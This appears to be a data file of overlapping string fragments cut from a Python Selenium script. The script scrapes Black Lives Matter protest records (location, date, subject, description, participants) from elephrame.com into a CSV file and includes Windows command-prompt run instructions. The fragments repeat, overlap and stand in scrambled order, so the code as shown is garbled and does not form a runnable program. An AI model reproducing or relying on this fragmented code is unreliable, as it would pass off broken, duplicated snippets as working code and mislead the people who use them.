"encoding='utf-8', mode='w+') headers = \"Location, Date, Subject, Description, Participants\\n\" f.write(headers) # loop clicks",
"\",\" + e.text + \"\\n\") # close browser driver.quit() # close csv file",
"append data from this click locations = driver.find_elements_by_class_name(\"item-protest-location\") dates = driver.find_elements_by_class_name(\"protest-start\") participants =",
"driver.find_elements_by_class_name(\"item-protest-location\") dates = driver.find_elements_by_class_name(\"protest-start\") participants = driver.find_elements_by_class_name(\"item-protest-participants\") descriptions = driver.find_elements_by_class_name(\"item-protest-description\") subjects = driver.find_elements_by_class_name(\"item-protest-subject\")",
"open python in command prompt: #1) Shift+Right Click -> open command prompt #2)",
"pagenum + 1 # append data from this click locations = driver.find_elements_by_class_name(\"item-protest-location\") dates",
"Date, Subject, Description, Participants\\n\" f.write(headers) # loop clicks over all pages page_new =",
"= driver.find_elements_by_class_name(\"item-protest-location\") dates = driver.find_elements_by_class_name(\"protest-start\") participants = driver.find_elements_by_class_name(\"item-protest-participants\") descriptions = driver.find_elements_by_class_name(\"item-protest-description\") subjects =",
"driver.get('https://elephrame.com/textbook/BLM') sleep(2) # save csv filename = \"../Data/BLM Protests/protests_scrape.csv\" f = codecs.open(filename, encoding='utf-8',",
"from https://www.youtube.com/watch?v=XQgXKtPSzUI&t=174s #How to open python in command prompt: #1) Shift+Right Click ->",
"locations = driver.find_elements_by_class_name(\"item-protest-location\") dates = driver.find_elements_by_class_name(\"protest-start\") participants = driver.find_elements_by_class_name(\"item-protest-participants\") descriptions = driver.find_elements_by_class_name(\"item-protest-description\") subjects",
"type \"python\" #To run the python script, type the following line into the",
"Subject, Description, Participants\\n\" f.write(headers) # loop clicks over all pages page_new = 1",
"next page if pagenum > -1: driver.find_element_by_xpath(\"\"\"//*[@id=\"blm-results\"]/div[1]/ul/li[4]\"\"\").click() # don't overflow website sleep(2) #update",
"for (a, b, c, d, e) in zip(locations, dates, subjects, descriptions, participants): print(a.text,",
"command prompt #2) type \"conda activate\" #3) type \"python\" #To run the python",
"if pagenum > -1: driver.find_element_by_xpath(\"\"\"//*[@id=\"blm-results\"]/div[1]/ul/li[4]\"\"\").click() # don't overflow website sleep(2) #update page numbers",
"b, c, d, e) in zip(locations, dates, subjects, descriptions, participants): print(a.text, b.text, c.text,",
"zip(locations, dates, subjects, descriptions, participants): print(a.text, b.text, c.text, d.text, e.text) f.write(a.text.replace(\",\", \"|\") +",
"prompt: #python \"C:\\Users\\travi\\Dropbox\\Police Killings\\Do Files\\webscrape.py\" # import packages import time import itertools import",
"= driver.find_elements_by_class_name(\"protest-start\") participants = driver.find_elements_by_class_name(\"item-protest-participants\") descriptions = driver.find_elements_by_class_name(\"item-protest-description\") subjects = driver.find_elements_by_class_name(\"item-protest-subject\") for (a,",
"driver.find_elements_by_class_name(\"item-protest-description\") subjects = driver.find_elements_by_class_name(\"item-protest-subject\") for (a, b, c, d, e) in zip(locations, dates,",
"Click -> open command prompt #2) type \"conda activate\" #3) type \"python\" #To",
"subjects, descriptions, participants): print(a.text, b.text, c.text, d.text, e.text) f.write(a.text.replace(\",\", \"|\") + \",\" +",
"\",\"\") + \",\" + d.text.replace(\",\", \"|\").replace(\"Description: \",\"\") + \",\" + e.text + \"\\n\")",
"chrome chrome_path=r\"C:\\Users\\travi\\Anaconda3\\Lib\\site-packages\\selenium\\chromedriver.exe\" driver = webdriver.Chrome(chrome_path) driver.get('https://elephrame.com/textbook/BLM') sleep(2) # save csv filename = \"../Data/BLM",
"pagenum = -1 while(pagenum < page_new): #click to next page if pagenum >",
"#click to next page if pagenum > -1: driver.find_element_by_xpath(\"\"\"//*[@id=\"blm-results\"]/div[1]/ul/li[4]\"\"\").click() # don't overflow website",
"page if pagenum > -1: driver.find_element_by_xpath(\"\"\"//*[@id=\"blm-results\"]/div[1]/ul/li[4]\"\"\").click() # don't overflow website sleep(2) #update page",
"from selenium import webdriver from time import sleep # access website through automated",
"time import itertools import csv import codecs from bs4 import BeautifulSoup from selenium",
"= pagenum + 1 # append data from this click locations = driver.find_elements_by_class_name(\"item-protest-location\")",
"# access website through automated chrome chrome_path=r\"C:\\Users\\travi\\Anaconda3\\Lib\\site-packages\\selenium\\chromedriver.exe\" driver = webdriver.Chrome(chrome_path) driver.get('https://elephrame.com/textbook/BLM') sleep(2) #",
"codecs.open(filename, encoding='utf-8', mode='w+') headers = \"Location, Date, Subject, Description, Participants\\n\" f.write(headers) # loop",
"> -1: driver.find_element_by_xpath(\"\"\"//*[@id=\"blm-results\"]/div[1]/ul/li[4]\"\"\").click() # don't overflow website sleep(2) #update page numbers for while",
"descriptions = driver.find_elements_by_class_name(\"item-protest-description\") subjects = driver.find_elements_by_class_name(\"item-protest-subject\") for (a, b, c, d, e) in",
"d, e) in zip(locations, dates, subjects, descriptions, participants): print(a.text, b.text, c.text, d.text, e.text)",
"descriptions, participants): print(a.text, b.text, c.text, d.text, e.text) f.write(a.text.replace(\",\", \"|\") + \",\" + b.text.replace(\",\",",
"\"|\").replace(\"Description: \",\"\") + \",\" + e.text + \"\\n\") # close browser driver.quit() #",
"all pages page_new = 1 pagenum = -1 while(pagenum < page_new): #click to",
"loop clicks over all pages page_new = 1 pagenum = -1 while(pagenum <",
"chrome_path=r\"C:\\Users\\travi\\Anaconda3\\Lib\\site-packages\\selenium\\chromedriver.exe\" driver = webdriver.Chrome(chrome_path) driver.get('https://elephrame.com/textbook/BLM') sleep(2) # save csv filename = \"../Data/BLM Protests/protests_scrape.csv\"",
"statement page_new = driver.find_element_by_xpath(\"\"\"//*[@id=\"blm-results\"]/div[1]/ul/li[3]/input\"\"\").get_attribute(\"value\") page_new = int(page_new, 10) #coverts from string to numeric",
"= -1 while(pagenum < page_new): #click to next page if pagenum > -1:",
"driver.find_elements_by_class_name(\"item-protest-participants\") descriptions = driver.find_elements_by_class_name(\"item-protest-description\") subjects = driver.find_elements_by_class_name(\"item-protest-subject\") for (a, b, c, d, e)",
"int(page_new, 10) #coverts from string to numeric pagenum = pagenum + 1 #",
"\"|\") + \",\" + b.text.replace(\",\", \"|\") + \",\" + c.text.replace(\",\", \"|\").replace(\"Subject(s): \",\"\") +",
"+ b.text.replace(\",\", \"|\") + \",\" + c.text.replace(\",\", \"|\").replace(\"Subject(s): \",\"\") + \",\" + d.text.replace(\",\",",
"f = codecs.open(filename, encoding='utf-8', mode='w+') headers = \"Location, Date, Subject, Description, Participants\\n\" f.write(headers)",
"csv filename = \"../Data/BLM Protests/protests_scrape.csv\" f = codecs.open(filename, encoding='utf-8', mode='w+') headers = \"Location,",
"line into the command prompt: #python \"C:\\Users\\travi\\Dropbox\\Police Killings\\Do Files\\webscrape.py\" # import packages import",
"e.text) f.write(a.text.replace(\",\", \"|\") + \",\" + b.text.replace(\",\", \"|\") + \",\" + c.text.replace(\",\", \"|\").replace(\"Subject(s):",
"\",\" + b.text.replace(\",\", \"|\") + \",\" + c.text.replace(\",\", \"|\").replace(\"Subject(s): \",\"\") + \",\" +",
"command prompt: #python \"C:\\Users\\travi\\Dropbox\\Police Killings\\Do Files\\webscrape.py\" # import packages import time import itertools",
"c.text, d.text, e.text) f.write(a.text.replace(\",\", \"|\") + \",\" + b.text.replace(\",\", \"|\") + \",\" +",
"#How to open python in command prompt: #1) Shift+Right Click -> open command",
"print(a.text, b.text, c.text, d.text, e.text) f.write(a.text.replace(\",\", \"|\") + \",\" + b.text.replace(\",\", \"|\") +",
"= driver.find_elements_by_class_name(\"item-protest-subject\") for (a, b, c, d, e) in zip(locations, dates, subjects, descriptions,",
"activate\" #3) type \"python\" #To run the python script, type the following line",
"dates = driver.find_elements_by_class_name(\"protest-start\") participants = driver.find_elements_by_class_name(\"item-protest-participants\") descriptions = driver.find_elements_by_class_name(\"item-protest-description\") subjects = driver.find_elements_by_class_name(\"item-protest-subject\") for",
"python in command prompt: #1) Shift+Right Click -> open command prompt #2) type",
"= \"../Data/BLM Protests/protests_scrape.csv\" f = codecs.open(filename, encoding='utf-8', mode='w+') headers = \"Location, Date, Subject,",
"to open python in command prompt: #1) Shift+Right Click -> open command prompt",
"b.text, c.text, d.text, e.text) f.write(a.text.replace(\",\", \"|\") + \",\" + b.text.replace(\",\", \"|\") + \",\"",
"+ 1 # append data from this click locations = driver.find_elements_by_class_name(\"item-protest-location\") dates =",
"automated chrome chrome_path=r\"C:\\Users\\travi\\Anaconda3\\Lib\\site-packages\\selenium\\chromedriver.exe\" driver = webdriver.Chrome(chrome_path) driver.get('https://elephrame.com/textbook/BLM') sleep(2) # save csv filename =",
"#python \"C:\\Users\\travi\\Dropbox\\Police Killings\\Do Files\\webscrape.py\" # import packages import time import itertools import csv",
"(a, b, c, d, e) in zip(locations, dates, subjects, descriptions, participants): print(a.text, b.text,",
"https://www.youtube.com/watch?v=XQgXKtPSzUI&t=174s #How to open python in command prompt: #1) Shift+Right Click -> open",
"d.text.replace(\",\", \"|\").replace(\"Description: \",\"\") + \",\" + e.text + \"\\n\") # close browser driver.quit()",
"import packages import time import itertools import csv import codecs from bs4 import",
"= \"Location, Date, Subject, Description, Participants\\n\" f.write(headers) # loop clicks over all pages",
"open command prompt #2) type \"conda activate\" #3) type \"python\" #To run the",
"numbers for while statement page_new = driver.find_element_by_xpath(\"\"\"//*[@id=\"blm-results\"]/div[1]/ul/li[3]/input\"\"\").get_attribute(\"value\") page_new = int(page_new, 10) #coverts from",
"save csv filename = \"../Data/BLM Protests/protests_scrape.csv\" f = codecs.open(filename, encoding='utf-8', mode='w+') headers =",
"+ e.text + \"\\n\") # close browser driver.quit() # close csv file f.close()",
"to numeric pagenum = pagenum + 1 # append data from this click",
"the command prompt: #python \"C:\\Users\\travi\\Dropbox\\Police Killings\\Do Files\\webscrape.py\" # import packages import time import",
"f.write(a.text.replace(\",\", \"|\") + \",\" + b.text.replace(\",\", \"|\") + \",\" + c.text.replace(\",\", \"|\").replace(\"Subject(s): \",\"\")",
"python script, type the following line into the command prompt: #python \"C:\\Users\\travi\\Dropbox\\Police Killings\\Do",
"#To run the python script, type the following line into the command prompt:",
"= int(page_new, 10) #coverts from string to numeric pagenum = pagenum + 1",
"import sleep # access website through automated chrome chrome_path=r\"C:\\Users\\travi\\Anaconda3\\Lib\\site-packages\\selenium\\chromedriver.exe\" driver = webdriver.Chrome(chrome_path) driver.get('https://elephrame.com/textbook/BLM')",
"while statement page_new = driver.find_element_by_xpath(\"\"\"//*[@id=\"blm-results\"]/div[1]/ul/li[3]/input\"\"\").get_attribute(\"value\") page_new = int(page_new, 10) #coverts from string to",
"from string to numeric pagenum = pagenum + 1 # append data from",
"mode='w+') headers = \"Location, Date, Subject, Description, Participants\\n\" f.write(headers) # loop clicks over",
"BeautifulSoup from selenium import webdriver from time import sleep # access website through",
"\",\"\") + \",\" + e.text + \"\\n\") # close browser driver.quit() # close",
"1 # append data from this click locations = driver.find_elements_by_class_name(\"item-protest-location\") dates = driver.find_elements_by_class_name(\"protest-start\")",
"prompt #2) type \"conda activate\" #3) type \"python\" #To run the python script,",
"d.text, e.text) f.write(a.text.replace(\",\", \"|\") + \",\" + b.text.replace(\",\", \"|\") + \",\" + c.text.replace(\",\",",
"sleep(2) # save csv filename = \"../Data/BLM Protests/protests_scrape.csv\" f = codecs.open(filename, encoding='utf-8', mode='w+')",
"# save csv filename = \"../Data/BLM Protests/protests_scrape.csv\" f = codecs.open(filename, encoding='utf-8', mode='w+') headers",
"= webdriver.Chrome(chrome_path) driver.get('https://elephrame.com/textbook/BLM') sleep(2) # save csv filename = \"../Data/BLM Protests/protests_scrape.csv\" f =",
"the python script, type the following line into the command prompt: #python \"C:\\Users\\travi\\Dropbox\\Police",
"script, type the following line into the command prompt: #python \"C:\\Users\\travi\\Dropbox\\Police Killings\\Do Files\\webscrape.py\"",
"\"../Data/BLM Protests/protests_scrape.csv\" f = codecs.open(filename, encoding='utf-8', mode='w+') headers = \"Location, Date, Subject, Description,",
"in command prompt: #1) Shift+Right Click -> open command prompt #2) type \"conda",
"import time import itertools import csv import codecs from bs4 import BeautifulSoup from",
"\",\" + d.text.replace(\",\", \"|\").replace(\"Description: \",\"\") + \",\" + e.text + \"\\n\") # close",
"the following line into the command prompt: #python \"C:\\Users\\travi\\Dropbox\\Police Killings\\Do Files\\webscrape.py\" # import",
"import itertools import csv import codecs from bs4 import BeautifulSoup from selenium import",
"e) in zip(locations, dates, subjects, descriptions, participants): print(a.text, b.text, c.text, d.text, e.text) f.write(a.text.replace(\",\",",
"selenium import webdriver from time import sleep # access website through automated chrome",
"pages page_new = 1 pagenum = -1 while(pagenum < page_new): #click to next",
"+ \",\" + d.text.replace(\",\", \"|\").replace(\"Description: \",\"\") + \",\" + e.text + \"\\n\") #",
"command prompt: #1) Shift+Right Click -> open command prompt #2) type \"conda activate\"",
"access website through automated chrome chrome_path=r\"C:\\Users\\travi\\Anaconda3\\Lib\\site-packages\\selenium\\chromedriver.exe\" driver = webdriver.Chrome(chrome_path) driver.get('https://elephrame.com/textbook/BLM') sleep(2) # save",
"for while statement page_new = driver.find_element_by_xpath(\"\"\"//*[@id=\"blm-results\"]/div[1]/ul/li[3]/input\"\"\").get_attribute(\"value\") page_new = int(page_new, 10) #coverts from string",
"\",\" + c.text.replace(\",\", \"|\").replace(\"Subject(s): \",\"\") + \",\" + d.text.replace(\",\", \"|\").replace(\"Description: \",\"\") + \",\"",
"#3) type \"python\" #To run the python script, type the following line into",
"itertools import csv import codecs from bs4 import BeautifulSoup from selenium import webdriver",
"to next page if pagenum > -1: driver.find_element_by_xpath(\"\"\"//*[@id=\"blm-results\"]/div[1]/ul/li[4]\"\"\").click() # don't overflow website sleep(2)",
"+ \",\" + b.text.replace(\",\", \"|\") + \",\" + c.text.replace(\",\", \"|\").replace(\"Subject(s): \",\"\") + \",\"",
"+ d.text.replace(\",\", \"|\").replace(\"Description: \",\"\") + \",\" + e.text + \"\\n\") # close browser",
"time import sleep # access website through automated chrome chrome_path=r\"C:\\Users\\travi\\Anaconda3\\Lib\\site-packages\\selenium\\chromedriver.exe\" driver = webdriver.Chrome(chrome_path)",
"clicks over all pages page_new = 1 pagenum = -1 while(pagenum < page_new):",
"prompt: #1) Shift+Right Click -> open command prompt #2) type \"conda activate\" #3)",
"over all pages page_new = 1 pagenum = -1 while(pagenum < page_new): #click",
"following line into the command prompt: #python \"C:\\Users\\travi\\Dropbox\\Police Killings\\Do Files\\webscrape.py\" # import packages",
"webdriver.Chrome(chrome_path) driver.get('https://elephrame.com/textbook/BLM') sleep(2) # save csv filename = \"../Data/BLM Protests/protests_scrape.csv\" f = codecs.open(filename,",
"pagenum = pagenum + 1 # append data from this click locations =",
"in zip(locations, dates, subjects, descriptions, participants): print(a.text, b.text, c.text, d.text, e.text) f.write(a.text.replace(\",\", \"|\")",
"+ \",\" + e.text + \"\\n\") # close browser driver.quit() # close csv",
"from time import sleep # access website through automated chrome chrome_path=r\"C:\\Users\\travi\\Anaconda3\\Lib\\site-packages\\selenium\\chromedriver.exe\" driver =",
"this click locations = driver.find_elements_by_class_name(\"item-protest-location\") dates = driver.find_elements_by_class_name(\"protest-start\") participants = driver.find_elements_by_class_name(\"item-protest-participants\") descriptions =",
"driver = webdriver.Chrome(chrome_path) driver.get('https://elephrame.com/textbook/BLM') sleep(2) # save csv filename = \"../Data/BLM Protests/protests_scrape.csv\" f",
"data from this click locations = driver.find_elements_by_class_name(\"item-protest-location\") dates = driver.find_elements_by_class_name(\"protest-start\") participants = driver.find_elements_by_class_name(\"item-protest-participants\")",
"import BeautifulSoup from selenium import webdriver from time import sleep # access website",
"from this click locations = driver.find_elements_by_class_name(\"item-protest-location\") dates = driver.find_elements_by_class_name(\"protest-start\") participants = driver.find_elements_by_class_name(\"item-protest-participants\") descriptions",
"sleep(2) #update page numbers for while statement page_new = driver.find_element_by_xpath(\"\"\"//*[@id=\"blm-results\"]/div[1]/ul/li[3]/input\"\"\").get_attribute(\"value\") page_new = int(page_new,",
"+ \",\" + c.text.replace(\",\", \"|\").replace(\"Subject(s): \",\"\") + \",\" + d.text.replace(\",\", \"|\").replace(\"Description: \",\"\") +",
"headers = \"Location, Date, Subject, Description, Participants\\n\" f.write(headers) # loop clicks over all",
"driver.find_elements_by_class_name(\"protest-start\") participants = driver.find_elements_by_class_name(\"item-protest-participants\") descriptions = driver.find_elements_by_class_name(\"item-protest-description\") subjects = driver.find_elements_by_class_name(\"item-protest-subject\") for (a, b,",
"f.write(headers) # loop clicks over all pages page_new = 1 pagenum = -1",
"Description, Participants\\n\" f.write(headers) # loop clicks over all pages page_new = 1 pagenum",
"-> open command prompt #2) type \"conda activate\" #3) type \"python\" #To run",
"type \"conda activate\" #3) type \"python\" #To run the python script, type the",
"from bs4 import BeautifulSoup from selenium import webdriver from time import sleep #",
"Killings\\Do Files\\webscrape.py\" # import packages import time import itertools import csv import codecs",
"driver.find_element_by_xpath(\"\"\"//*[@id=\"blm-results\"]/div[1]/ul/li[4]\"\"\").click() # don't overflow website sleep(2) #update page numbers for while statement page_new",
"page numbers for while statement page_new = driver.find_element_by_xpath(\"\"\"//*[@id=\"blm-results\"]/div[1]/ul/li[3]/input\"\"\").get_attribute(\"value\") page_new = int(page_new, 10) #coverts",
"\"|\").replace(\"Subject(s): \",\"\") + \",\" + d.text.replace(\",\", \"|\").replace(\"Description: \",\"\") + \",\" + e.text +",
"click locations = driver.find_elements_by_class_name(\"item-protest-location\") dates = driver.find_elements_by_class_name(\"protest-start\") participants = driver.find_elements_by_class_name(\"item-protest-participants\") descriptions = driver.find_elements_by_class_name(\"item-protest-description\")",
"subjects = driver.find_elements_by_class_name(\"item-protest-subject\") for (a, b, c, d, e) in zip(locations, dates, subjects,",
"csv import codecs from bs4 import BeautifulSoup from selenium import webdriver from time",
"\"|\") + \",\" + c.text.replace(\",\", \"|\").replace(\"Subject(s): \",\"\") + \",\" + d.text.replace(\",\", \"|\").replace(\"Description: \",\"\")"
] |